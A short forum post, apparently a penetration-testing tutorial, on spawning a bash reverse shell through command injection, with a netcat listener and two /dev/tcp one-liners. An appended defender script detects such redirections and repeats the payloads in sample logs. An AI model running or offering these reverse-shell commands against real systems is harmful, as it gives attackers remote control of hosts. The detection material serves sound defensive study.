BASH - Creating a Reverse shell on Linux using BASH
  • BASH - Creating a Reverse shell on Linux using BASH

    In some cases you will need a reverse shell but the target may not have any handy tools installed to accomplish this, or maybe you don't yet know what possibilities the target host has to offer. If you already have some kind of a shell, this is obviously not interesting, but this comes in handy if you are able to do some kind of command injection and are looking for an easier way to quickly get a shell.

    First you will need a listener on the attacker box to receive the reverse shell and this can be done with one of the many tools such as nc (netcat), ncat, sbd and many others.
    Here we set up a listener on the attacker host using netcat to listen on port 4444.
    Code:
    # nc -nvlp 4444
    On the target host you will need to inject the following command to start a new interactive bash shell with direction over the local network.
    Code:
    # /bin/bash -i > /dev/tcp/10.10.10.10/4444 0<&1 2>&1
    This command will send the shell to the IP address 10.10.10.10 on port 4444 that we picked as the listening port. Change the destination IP address and port number to match your setup.

    An alternative way of accomplishing the same thing could be to execute the command below. This will also send you a reverse bash shell.
    Code:
    # bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
    This will send the newly spawned bash to the listening netcat session on the attacker box. It is very simple and highly effective because it does not require the attacker to install any additional packages. One thing to note is that the application or service that you are doing your command injection into will hang as long as you keep the shell open. You can close the shell on the attacker box with the "exit" command and that will in turn free the service or application that was injected into.
    Last edited by Resheph; 06-02-2018, 12:31 PM. Reason: Added alternative way of spawning a bash shell
    Certified Security Geek
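
For defenders, both commands in the post share one observable: a redirection operator pointing at bash's /dev/tcp/<host>/<port> path. The following is an added example, not part of the original post; the "pid user command" log format, the sample lines and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag logged command lines that redirect to /dev/tcp/<host>/<port>.
# bash interprets that path itself while setting up redirections, so there is
# usually no device node to watch; the string shows up in the command line of
# the shell that parsed it (for example the "sh -c ..." spawned by a web app).

# Constructed sample in an assumed "pid user command" format.
sample_log() {
cat <<'EOF'
1001 www-data sh -c ping -c 1 127.0.0.1
1002 www-data sh -c ping -c 1 127.0.0.1; /bin/bash -i > /dev/tcp/10.10.10.10/4444 0<&1 2>&1
1003 www-data sh -c bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
1004 root bash -c echo > /dev/tcp/192.0.2.7/22
1005 alice grep -r /dev/tcp /usr/share/doc
EOF
}

# Reads log lines on stdin and prints "pid user host port kind" per hit.
#   interactive-shell: an "sh -i"/"bash -i" whose I/O is sent to the socket
#   socket-io:         any other redirection to /dev/tcp (probe, transfer, ...)
# A bare mention of /dev/tcp without a redirection operator is not reported.
find_devtcp_redirects() {
  target='[<>]&?[[:space:]]*/dev/tcp/([^/[:space:]]+)/([0-9]+)'
  sed -nE \
    -e "s|^([0-9]+) ([^ ]+) .*sh[[:space:]]+-i[[:space:]]*${target}.*|\1 \2 \3 \4 interactive-shell|p" \
    -e 't' \
    -e "s|^([0-9]+) ([^ ]+) .*${target}.*|\1 \2 \3 \4 socket-io|p"
}

sample_log | find_devtcp_redirects
```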